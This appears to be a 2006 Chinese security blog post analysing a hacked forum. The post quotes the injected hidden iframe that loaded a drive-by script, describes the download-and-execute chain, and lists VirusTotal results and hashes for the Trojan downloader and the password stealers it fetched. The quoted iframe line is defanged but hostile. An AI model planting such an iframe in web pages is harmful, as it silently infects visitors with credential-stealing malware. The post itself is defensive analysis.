某论坛被加入下载Trojan-Downloader.Win32.Delf.ajm的代码

endurer 原创
2006-12-15 第1

论坛首被加入代码:
/--------
<iframe src=hxxp://www.z*z***yqr.com.**/lpf/wm.htm width=0 height=0 frameborder=0></iframe>
--------/


wm.htm 的内容为JavaScript脚本程序,功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 /mc/game/lpf.exe,保存为 c:/boot.exe,并利用Shell.Application 对象 的 ShellExecute 方法 来运行。

lpf.exe 采用 Borland Delphi Setup Module 制作
/-------
文件说明符 : D:/virus/lpf.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2006-12-15 20:52:52
修改时间 : 2006-12-15 20:52:54
访问时间 : 2006-12-15 0:0:0
大小 : 15872 字节 15.512 KB
MD5 : 1914ec3e09f9bca86a10034ff9b3b985
-------/
Kaspersky报为 Trojan-Downloader.Win32.Delf.ajm,瑞星报为Trojan.DL.Multi.wen

STATUS: FINISHED

Complete scanning result of "lpf.exe", received in VirusTotal at 12.15.2006, 14:28:30 (CET).

AntivirusVersionUpdateResult
AntiVir7.3.0.1512.15.2006TR/Delphi.Downloader.Gen
Authentium4.93.812.14.2006Possibly a new variant of W32/SecRisk-ProcessPatcher-Sml-based!Maximus
Avast4.7.892.012.15.2006 no virus found
AVG38612.15.2006 no virus found
BitDefender7.212.15.2006BehavesLike:Win32.ExplorerHijack
CAT-QuickHeal8.0012.14.2006TrojanDownloader.Delf.ajm
ClamAVdevel-2006042612.15.2006Trojan.Downloader-51
DrWeb4.3312.15.2006Trojan.DownLoader.14624
eSafe7.0.14.012.14.2006 no virus found
eTrust-InoculateIT23.73.8612.15.2006 no virus found
eTrust-Vet30.3.325212.15.2006 no virus found
Ewido4.012.15.2006Downloader.Delf.ajm
Fortinet2.82.0.012.15.2006 no virus found
F-Prot3.16f12.14.2006Possibly a new variant of W32/SecRisk-ProcessPatcher-Sml-based!Maximus
F-Prot44.2.1.2912.14.2006W32/SecRisk-ProcessPatcher-Sml-based!Maximus
IkarusT3.1.0.2612.15.2006 no virus found
Kaspersky4.0.2.2412.15.2006Trojan-Downloader.Win32.Delf.ajm
McAfee491912.14.2006Generic Delphi
Microsoft1.180412.15.2006 no virus found
NOD32v2192312.15.2006probably a variant of Win32/TrojanDownloader.Delf.NDQ
Norman5.80.0212.15.2006W32/Delf.TWZ
Panda9.0.0.412.15.2006Suspicious file
Prevx1V212.15.2006 no virus found
Sophos4.12.012.14.2006 no virus found
Sunbelt2.2.907.011.30.2006 no virus found
TheHacker6.0.3.13212.14.2006 no virus found
UNA1.8312.14.2006 no virus found
VBA323.11.112.14.2006 no virus found
VirusBuster4.3.19:912.14.2006 no virus found

Aditional Information
File size: 15872 bytes
MD5: 1914ec3e09f9bca86a10034ff9b3b985
SHA1: ad95735b4cb4ed24767801f3b3bde4823cd24281

lpf.exe会下载下列文件:
1)/mc/bao/lipengfei.exe

采用 UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo 加壳
/-------
文件说明符 : D:/virus/lipengfei.exe
属性 : A---
获取文件版本信息大小失败!创建时间 : 2006-12-15 21:2:56
修改时间 : 2006-12-15 21:2:58
访问时间 : 2006-12-15 0:0:0
大小 : 39069 字节 38.157 KB
MD5 : 8a91fe8298abe6d136e6e4a2071abb1e
-------/
瑞星报为:Trojan.PSW.QQPass.qxf

Complete scanning result of "lipengfei.exe", received in VirusTotal at 12.15.2006, 14:39:16 (CET).

AntivirusVersionUpdateResult
AntiVir7.3.0.1512.15.2006DR/Delphi.Gen
Authentium4.93.812.14.2006 no virus found
Avast4.7.892.012.15.2006Win32:QQPass-EU
AVG38612.15.2006PSW.Generic2.SUE
BitDefender7.212.15.2006Generic.PWStealer.A771A4B9
CAT-QuickHeal8.0012.14.2006 no virus found
ClamAVdevel-2006042612.15.2006 no virus found
DrWeb4.3312.15.2006Trojan.PWS.Qqpass.326
eSafe7.0.14.012.14.2006suspicious Trojan/Worm
eTrust-InoculateIT23.73.8612.15.2006Win32/QQPass.Variant!Trojan
eTrust-Vet30.3.325212.15.2006 no virus found
Ewido4.012.15.2006Trojan.QQPass.ra
Fortinet2.82.0.012.15.2006 no virus found
F-Prot3.16f12.14.2006 no virus found
F-Prot44.2.1.2912.14.2006 no virus found
IkarusT3.1.0.2612.15.2006Trojan-PSW.Win32.Delf.IC
Kaspersky4.0.2.2412.15.2006Trojan-PSW.Win32.QQPass.ra
McAfee491912.14.2006PWS-Hook.dll
Microsoft1.180412.15.2006 no virus found
NOD32v2192312.15.2006probably a variant of Win32/PSW.QQShou.EP
Norman5.80.0212.15.2006W32/QQPass.CHM
Panda9.0.0.412.15.2006Suspicious file
Prevx1V212.15.2006 no virus found
Sophos4.12.012.14.2006 no virus found
Sunbelt2.2.907.011.30.2006 no virus found
TheHacker6.0.3.13212.14.2006Trojan/PSW.QQPass.ra
UNA1.8312.14.2006Trojan.PSW.Win32.QQPass.6EDE
VBA323.11.112.14.2006BackDoor.Pigeon.516
VirusBuster4.3.19:912.14.2006 no virus found

Aditional Information

File size: 39069 bytes
MD5: 8a91fe8298abe6d136e6e4a2071abb1e
SHA1: 6909040f888c037999d64a32f5ef90521602ab93
packers: UPX

2)/mc/pqpq.exe
采用nSPack 1.3 -> North Star/Liu Xing Ping 加壳
/-------
文件说明符 : D:/pe/virus/pqpq.exe
属性 : A---
语言 : 中文(中国)
文件版本 : 0.00.0195
说明 :
版权 :
备注 :
产品版本 : 0.00.0195
产品名称 : Xcd
公司名称 : Xcd
合法商标 :
内部名称 : 23oigj
源文件名 : 23oigj.exe
创建时间 : 2006-12-15 21:3:12
修改时间 : 2006-12-15 21:3:14
访问时间 : 2006-12-15 0:0:0
大小 : 44151 字节 43.119 KB
MD5 : 04433d91f101e7c95d5d77c1cbe1efd6
-------/
瑞星报为:Trojan.PSW.Misc.kif

Complete scanning result of "pqpq.exe", received in VirusTotal at 12.15.2006, 14:47:23 (CET).

AntivirusVersionUpdateResult
AntiVir7.3.0.1512.15.2006TR/PSW.Lmir.44151
Authentium4.93.812.14.2006Possibly a new variant of W32/Suspicious:VisualBasicMalware!Maximus
Avast4.7.892.012.15.2006 no virus found
AVG38612.15.2006 no virus found
BitDefender7.212.15.2006Generic.PWSLmir.D80E5DAD
CAT-QuickHeal8.0012.14.2006(Suspicious) - DNAScan
ClamAVdevel-2006042612.15.2006 no virus found
DrWeb4.3312.15.2006BackDoor.Generic.1482
eSafe7.0.14.012.14.2006suspicious Trojan/Worm
eTrust-InoculateIT23.73.8612.15.2006 no virus found
eTrust-Vet30.3.325212.15.2006 no virus found
Ewido4.012.15.2006 no virus found
Fortinet2.82.0.012.15.2006Spy/WOWSTEAL
F-Prot3.16f12.14.2006Possibly a new variant of W32/Suspicious:VisualBasicMalware!Maximus
F-Prot44.2.1.2912.14.2006W32/Suspicious:VisualBasicMalware!Maximus
IkarusT3.1.0.2612.15.2006Backdoor.Win32.PcClient.GV
Kaspersky4.0.2.2412.15.2006 no virus found
McAfee491912.14.2006 no virus found
Microsoft1.180412.15.2006PWS:Win32/Wowsteal.gen!A
NOD32v2192312.15.2006a variant of Win32/PSW.Legendmir
Norman5.80.0212.15.2006 no virus found
Panda9.0.0.412.15.2006Suspicious file
Prevx1V212.15.2006Trojan.SystemPoser
Sophos4.12.012.14.2006Mal/PWS-D
Sunbelt2.2.907.011.30.2006VIPRE.Suspicious
TheHacker6.0.3.13212.14.2006 no virus found
UNA1.8312.14.2006 no virus found
VBA323.11.112.14.2006BackDoor.Generic.1482
VirusBuster4.3.19:912.14.2006novirus:Packed/NSPack

Aditional Information

File size: 44151 bytes
MD5: 04433d91f101e7c95d5d77c1cbe1efd6
SHA1: 26478a8cb49411d3e87132cdad2c82993bf545f2
packers: NSPACK
packers: Packed
Prevx info: http://fileinfo.prevx.com/fileinfo.asp?PXC=cc5f62172717
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.

3)/mc/gezi.exe 未能获取
4)/mc/dabao.exe 未能获取
5)/mc/xbao.exe 未能获取

保存为C:/Program Files/Common Files下的
1.exe
2.exe
3.exe
4.exe
5.exe

与此前发现的十分相似,不过文件的MD5不同。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值